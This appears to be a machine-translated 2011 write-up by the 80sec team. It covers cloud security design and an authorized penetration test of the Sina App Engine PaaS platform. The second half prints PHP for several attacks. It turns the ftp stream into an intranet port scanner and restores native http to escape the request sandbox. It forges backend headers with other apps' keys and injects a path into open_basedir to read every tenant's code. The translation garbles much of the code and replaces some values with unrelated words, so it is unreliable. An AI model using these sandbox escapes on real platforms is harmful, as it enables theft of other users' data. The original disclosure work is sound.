A Brief Discussion on cloud security from an authorized security evaluation of SAE

 

[Directory]

I. background and description

2. What is Cloud

3. What is cloud security?

4. How to Design cloud security

5. An authorized security evaluation test for SAE

 

I. background and description

 

Due to slow access to foreign servers and frequent access failures, we have been working with SAE to migrate the WooYun project to a stable SAE platform for a long time, later, we established cooperation with Sina SAE on security, including the security evaluation test. On the other hand, most discussions on cloud security in the industry are on the theoretical aspect. Many experts, scholars, security researchers, and hackers are discussing cloud security, however, there are few cases of cloud evaluation, analysis, and even intrusion into the actual production environment. 80sec has always had its own thoughts on cloud security, however, there is no actual case, so no relevant documentation has been produced. After SAE fixes these security problems, this release of a typical paas cloud evaluation process can be made public by SAE. By the way, we provide some superficial ideas on the security of the 80 sec, related detailed security questions will also be submitted to the wooyun-vulnerability reporting platform, saying that security is better than security :)

 

2. What is Cloud

 

We understand that cloud is a new way to use resources, including storage, Data, computing, and networks ...... And so on. Compared with traditional resources, this kind of resource is closer to a kind of basic energy and can be used as much as needed. It is similar to the elasticity of water and electricity in the infrastructure, and it is charged based on the usage, so far, it is difficult for us to have a precise definition of the cloud. From the security perspective, we can only roughly divide the cloud:

 

Private cloud: A cloud service that provides internal business and unlimited computing and storage capabilities;

Public cloud: a cloud that provides services to external users. It may provide services to external users in the form of saas together with the company's core resources on the basis of unlimited computing and storage capabilities;

 

Similarly, according to the actual Expression and Function of the cloud, it can be divided into iaas, paas, and saas. Different types of cloud resources are essentially different. The next layer serves the previous layer, iaas provides fine-grained division of network and system resources. paas relies on iaas to open storage, computing, data, and other resources to third-party developers, software-based saas can be combined with the company's core resources to provide services to users;

 

3. What is cloud security?

 

Security is always for data. The essence of security is data security, including availability, confidentiality, and non-tampering. A challenge to security is that cloud security essentially changes the data processing method, from the traditional data owner's security responsibilities to the data processor and data owner's security responsibilities at the same time.

Another challenge brought by cloud security is a conflict. For users, if I want to use the cloud, because I may transmit sensitive data to the cloud, I must first ensure that the cloud is secure, if I am a cloud builder and I am responsible for cloud security, I must first confirm the data processing and collaboration methods in the cloud, however, when the data size and specific applications are not mature, it is difficult to do so. I cannot protect a system with immature threat models, therefore, at present, there is a situation where cloud security is ahead of cloud computing, but at the same time, cloud security is at a theoretical and policy level due to the insufficient development of cloud computing services;

Different clouds have different security threats due to different business objectives and data, for example, what paas needs to consider is completely different from the security that iaas needs to consider. Likewise, the security objectives of Private clouds are completely different from those of public clouds, as mentioned by 80sec a long time ago, it makes no sense not to understand context Security;

 

4. How to Design cloud security

 

I believe that the security of any thing will be caused by the following aspects: the value inherent in it, the risks caused by this value, whether there are any protection and actual solutions that take this risk into account, whether the solution is correctly implemented and whether an effective system is formed after the solution is correctly implemented for management and O & M. The absence of any link will lead to insecurity;

We believe that there is no uniform cloud security for the cloud, so we can only choose a typical example paas to discuss our simple views on cloud security design. We will consider the following aspects:

 

A) asset value: we need to understand the core value of this business. Data of different values will lead to different security threats. For example, for paas, we are not in favor of running private servers (You know), banks and other systems on paas. It is not suitable for you, and the introduction of high-value assets will increase the risk of the cloud;

 

B) Security Risks: A website involving state secrets may suffer different security risks from a personal Blog, analyze possible risks, such as denial of service, illegal access to user data, and penetration of internal networks;

 

C) Threat modeling: Based on the possible risks of the cloud and the channels that may cause these risks, the focus is on analyzing the system architecture, security domains, and boundaries of security domains, in addition, to establish a threat model, for example, in terms of paas cloud platform and internet boundaries, you must consider internet network attacks and malicious scanning, the boundary threat between user data and platform data should be considered between malicious code and platform data, or even the paas multi-user boundary; in addition, the impact of the platform on the internal data center should also be considered;

 

D) Security Policy: Based on the above-mentioned Threat modeling, We can conduct necessary security policies for various threats to prevent and weaken risks. For example, we need to deploy a firewall on the paas cloud boundary, deploy intrusion detection and monitoring systems between platforms and internal networks, and implement security isolation between platforms, users, and users;

 

E) technical control: it is difficult and important to implement specific strategies, most enterprises lack technical assessment on this part, and do not have enough technical support. security policies are just empty-text. This part should basically include security baselines, access control, and exception monitoring.

 

We can see that our security design is a data and risk-driven security design. Taking Sina cloud SAE as an example, we can divide the data involved into several security areas by attribute and security level, security control is implemented in various security zones. Inter-regional access needs to be strictly monitored and audited:

 

A) Sina internal data (in Sina IDC, unauthorized access to Sina internal receipts will cause harm)

B) SAE platform data (the platform supports the security of the entire user data, with a high security level)

C) SAE user data (which can be further refined into user data A and user data B)

 

The attributes of these regions are completely different. Different access control is required for access. Internal data should be completely isolated from the platform itself, this part can be controlled by dividing independent networks. Theoretically, we trust the internal network, but if the platform is important enough, we can isolate its internal access and requests; the Platform data should be completely isolated from users. This part is based on the host and some background services, so you can control it through the sandbox on the network and the host; data between users needs to be isolated because of the same security. This part requires an isolation mechanism at the application layer. For the isolation between the platform and the Internet, we need to strictly defend against ddos attacks such as DOS and some common application vulnerabilities;

If these parts are not completed properly, security issues will occur. Whether implemented or evaluated, we will consider these aspects;

 

5. An authorized security evaluation test for SAE

 

Our website has been built on the SAE platform, which is very good in terms of speed, stability, and staff attitude towards the problem, previously, SAES and wooyun were interested in cooperating with each other, including the safety evaluation and detection of SAES. SAES were well protected and had positive feedback and repair on the problems we found, we will share some of the problems we found here after we get the SAE's permission. I believe this will be helpful for other paas-like platforms.

 

1 know it, learn about our testing objectives

 

According to our rough analysis of Sina cloud, the data is divided into Sina internal data, SAE platform data and SAE user data. Among them, Sina internal data mainly refers to other business data in the IDC, platform data includes platform management, O & M, and related business data. User data mainly refers to data uploaded to SAES, including code, database, and storage. According to our security goals, these data should be isolated from each other and should not affect each other and will not be accessed illegally;

Sina's cloud protection is basically divided into several aspects. On the one hand, the External Firewall implements the control boundary between sae and the Internet, and uses an appropriate internal ACL to protect internal data, what we are very concerned about is the exclusive aspect of paas: the isolation between user data and the cloud platform. This part is the most complex and flexible; SAE isolates user data mainly by user names and passwords. Different applications are isolated by access_key and secert_key, access to backend databases, storage, and other applications must provide access_key and secert_key. Isolation between user data and platforms mainly includes that all resources must be used through interfaces provided by sae, for the code execution layer, sae simulates a sandbox environment through disable_function and open_basedir, in this way, the sandbox in the execution State ensures that users cannot access data other than their resources;

We can see that sae has made great efforts in this area, and we have also tried to make a breakthrough;

 

2. Check the available resources.

 

Since we can truly interact with the rich resources of other users contained in the sae and sae backend, the only way is to execute our own code, therefore, the environment and actual restrictions of our code are very important to us. We use the following code to judge the system:

 

 

<? Php

 

$ Exts = get_loaded_extensions ();

$ Disables = ini_get ("disable_functions ");

$ Disables = explode (",", $ disables );

 

$ Balls = get_defined_functions ();

 

$ Myfun = $ balls ['user'];

 

For ($ I = 0; $ I <count ($ calls ['internal']); $ I ++ ){

If (! In_array ($ calls ['internal'] [$ I], $ disables )){

$ Myfun [] = $ balls ['internal'] [$ I];

}

}

 

Var_dump ($ myfun );

 

?>

 

This is the executable scope of all our code, that is, all the possible interactions. As you can see, what we already know can break through the limitations of sandbox functions and methods;

 

3. analyze our environment

 

At the same time, we can see that sae supports the phpinfo function, so we can simply judge the current environment through phpinfo. We need to consider the following options:

 

 

Registered PHP Streams

Apache2handler

Apache Environment

 

Open_basedir

Disable_functions

 

Auto_prepend_file

 

In this way, we probably understand the runtime environment of our code, and we know some things done at the application layer sae according to the prompts of auto_prepend_file, there are too many secrets hidden here, including the working method of the backend service and the possible gaps in the sandbox manufactured by SAES. After all, this is the security control implemented at the same layer as our code, instead of the underlying layer, it mainly includes network request encapsulation and backend Resource Access encapsulation, where access_key and secert_key play a role;

 

4. attack methods

 

Our code runs in an open_basedir and disable_function environment. These two options normally isolate our code from the file system and the operating system, leaving us in a restricted environment, at the same time, because the sae code at the php layer is better than our code execution, a sandbox is also implemented at the php code layer. In this sandbox, our interaction with any other resource is limited, such as http requests and socks requests, while normal connections that are allowed, such as mysql, pass our test, we found that because the underlying mysql code has been modified, in the sae code execution environment, we cannot connect any data beyond our inherent permissions, however, we can see that the SAES are selected at the application layer rather than the sandbox at the underlying layer. Therefore, as long as we have the possibility to select some places where the sandbox is not controlled, we may bypass it, at the same time, problems may occur if the sandbox itself is not implemented well.

First, let's take a look at whether the sandbox may be vulnerable. We can simply traverse the allowed php functions and find that such a function, mb_send_mail, is not disabled, 80sec once mentioned to disable the mail function because it is an interface for php to interact with the underlying system, while mb_send_mail is also an encapsulation of the mail function, after a simple test, we proved that the function could indeed be used to read and write the underlying system. However, due to some network reasons, we got a 500 error, the results we need have not been truthfully reported to us, but sae has confirmed that this problem does exist.

In addition, we have observed that sae supports a large number of streams, but only one http protocol is actually encapsulated. The purpose of encapsulation is to control user requests, for example, you can restrict the target address of access and control the number of requests in a more precise manner, while there is no restriction on the native ftp protocol, for example, in this case, we can use this to create a simple Intranet port scanner:

 

 

Echo (file_get_contents ('ftp: // 127.0.0.1: 22/111 '));

 

Due to the fact that sae tends to handle errors too well for developers, we can see whether the network is reachable, the port is not open, or the Protocol does not match, in this way, we can even detect the degree of isolation between the sae and the internal network.

After all, the ftp protocol is not very friendly. For the encapsulated http protocol, we find that stream_wrapper_unregister and stream_wrapper_restore are not disabled. Therefore, through these two functions, we can restore native http requests, initiate an http request to all the places we want to launch:

 

 

If (in_array ("http", stream_get_wrappers ())){

Stream_wrapper_unregister ("http ");

}

 

Stream_wrapper_restore ("http "));

 

This is only a breakthrough in the network request sandbox. On the actual user data layer, we find that backend users share some basic services, such as memcache, such as mysql, the backend uses the access_key and secert_key passed by the user to identify the user. We made an interesting experiment:

 

 

Define ('sae _ ACCESSKEY ', 'm0lm3wyxjyo ');

Define ('sae _ secretkey', '5d2dmz1xwyihjd2m3xzximw5wj30jix0djxl1c5i0iz5 ');

Define ('sae _ MYSQL_HOST_M ', 'W .rdc.sae.sina.com.cn ');

Define ('sae _ MYSQL_HOST_S ', 'r .rdc.sae.sina.com.cn ');

Define ('saes_mysql_port ', 3307 );

Define ('sae _ MYSQL_USER ', SAE_ACCESSKEY );

Define ('sae _ MYSQL_PASS ', SAE_SECRETKEY );

Define ('sae _ MYSQL_DB ', 'app _'. 'wscan ');

 

Var_dump (mysql_connect ('R .rdc.sae.sina.com.cn: 000000', 'm0lm3wyxjyo ', 'weight '));

 

This will prompt

 

SAE_Warning: mysql_connect () [function. mysql-connect]: this app is not authorised in eval. php

 

It seems that the underlying Mysql imposes restrictions on connected applications and does not allow cross-application database connection. However, we know that databases can be connected in addition to the application code environment, databases can also be connected in the Panel provided by SAE. The implementation in the control panel is the connection through access_key and secret_key in the background, we only need to replace it with the corresponding key of the other applications we have obtained to connect successfully. This sandbox seems too simple and still does not implement the principle that the application can only access its own data, so how can we get others' access_key and secret_key? Let's look at the auto_prepend_file file. These two values are transmitted from the HTTP request, and for implementation reasons, this content can be seen directly in phpinfo. Search for sae and phpinfo in hundreds of degrees ......

It seems that we can understand some mechanisms and mechanisms of sae, but they are all between users. We are curious why sae needs to pass access_key and secert_key in the http header, this seems hard to understand. After analyzing the implementation mechanism of sae, we can make the following understandings. After receiving the request, the front end will make some logical judgments on the request, for example, whether the application is a valid application, whether the application resources exceed the standard, and so on. After the validity verification is completed, the request is forwarded to the backend execution layer, some data required by the execution environment, such as access_key and secert_key, is transmitted to the execution environment from here. The advantage here is that the execution environment is only responsible for execution and does not need to verify the validity of the request, changes to any application, such as disabling or enabling deletion, will not affect the backend execution environment, but there will be obvious problems here, if the validity of the request is only verified by the frontend, it may affect the correctness of the backend logic if we can directly forward the request to the backend. Note the following information in phpinfo:

 

 

DOCUMENT_ROOT/data1/www/htdocs

SERVER_ADMIN saesupport@sina.cn

SCRIPT_FILENAME/data1/www/htdocs/549/wscan/1/phpinfo. php

 

We are requesting phpinfo. php and document_root are in/data1/www/htdocs. Theoretically, they cannot be mapped to/data1/www/htdocs/549/wscan/1/phpinfo. php, and from this path we guess that the Execution Code of all applications is under/data1/www/htdocs/, and all the Execution Code runs under the same user identity, for some reason, sae has not designed to isolate executable code of all users. isolation is only implemented at the execution layer by using dynamic ing and dynamic restrictions. Is there any problem with this mechanism, see the following code:

 

 

If (in_array ("http", stream_get_wrappers ())){

Stream_wrapper_unregister ("http ");

}

 

Stream_wrapper_restore ("http ");

 

$ Opt = array (

'Http' => array (

'Header' => "Host: Drivers \ r \ nX-Forwarded-For: 61.135.165.180, drivers \ r \ nAppName: webmanage \ r \ nAccessKey: ynz0jyo1k1 \ r \ nSecretKey: export \ r \ nAppHash: 928 \ r \ nMysqlPort: 3307 \ r \ nAppCookie: default_version = 1; xhprof =; debug = 1; \ r \ nConnection: close \ r \ nCookie: saeut = 220.181.50.244.1321955942519836 \ r \ nAppVersion: 1 ",

'Protocol _ version' => '1. 1'

)

);

Stream_context_set_default ($ opt );

$ D = stream_context_get_default ();

Var_dump (file_get_contents ("http: // 10.67.15.23/phpinfo. php "));

 

We used the previous http encapsulation method to implement an original http request, and the request was directly sent to the backend executable layer code. We intentionally used someone else's appname and apphash to request a phpinfo, the results show that, as we have guessed, all request and request restrictions are dynamically generated. The generation principle is based on appname and apphash, for example:

 

 

SCRIPT_FILENAME/data1/www/htdocs/549/wscan/1/phpinfo. php

 

The Request Path is determined based on the requested apphash, appname, and DOCUMENT_ROOT. From this perspective, the resources of all users are more like different pages under the same site, in theory, other user resources can be obtained, and we try to continue to break through. Since the Request Path is dynamically generated, we have reason to believe that open_basedir is also dynamically generated. Since it is dynamically generated, we can perform an unprecedented injection:

 

Open_basedir format:/dir/1:/dir/2

 

If we can generate a piece of open_basedir with/dir/1: // dir/2, we can break through the sandbox of the file system. At the same time, this request must be legal, because the requested file resources will be consistent with this path, we can create a directory named "/: //", combined .. /directory traversal. We can meet the requirements of both open_basedir and SCRIPT_FILENAME. Finally, let's construct the following request:

 

 

If (in_array ("http", stream_get_wrappers ())){

Stream_wrapper_unregister ("http ");

}

 

Stream_wrapper_restore ("http ");

 

$ Opt = array (

'Http' => array (

'Header' => "Host: wooyun.sinaapp.com \ r \ nX-Forwarded-For: 61.135.165.180, 61.135.165.180 \ r \ nAppName: webmanage/1 /:/:/.. /.. /.. /\ r \ nAccessKey: ynztttt1k1 \ r \ nSecretKey: encrypt \ r \ nAppHash: 928 \ r \ nMysqlPort: 3307 \ r \ nAppCookie: default_version = 1; xhprof =; debug = 1; \ r \ nConnection: close \ r \ nCookie: saeut = 220.181.50.244.1321955942519836 \ r \ nAppVersion: 1 ",

'Protocol _ version' => '1. 1'

)

);

Stream_context_set_default ($ opt );

$ D = stream_context_get_default ();

Var_dump (file_get_contents ("http: // 10.67.15.23/phpinfo. php "));

 

Note: AppName: webmanage/1 /:/:/.. /.. /.. /. At this time, all requests in webmanage will bypass the open_basedir restrictions. We have successfully accessed all users' code resources, including the resources in the SAE platform execution environment;

After obtaining the data permission, we tried to break through the sae system environment and found some problems, but we did not get any real breakthroughs. We will share the opportunity in the future :)

 

5. Summary

 

Safety is taken into account during the design of SAE, And the protection is very strict. It achieves an elegant balance between ease of use and security, but we can also see that for the paas design, because the user's code should be allowed to run as friendly and efficient as possible, it is easy to have some problems in some security policy implementation details, as the particularity of the paas application context, other paas vendors should pay more attention to these security issues during implementation and design to avoid security losses to platforms and users.

 

EMail: jianxin # 80sec.com

Site: http://www.80sec.com

Date: 2011-12-20

From: http://www.80sec.com/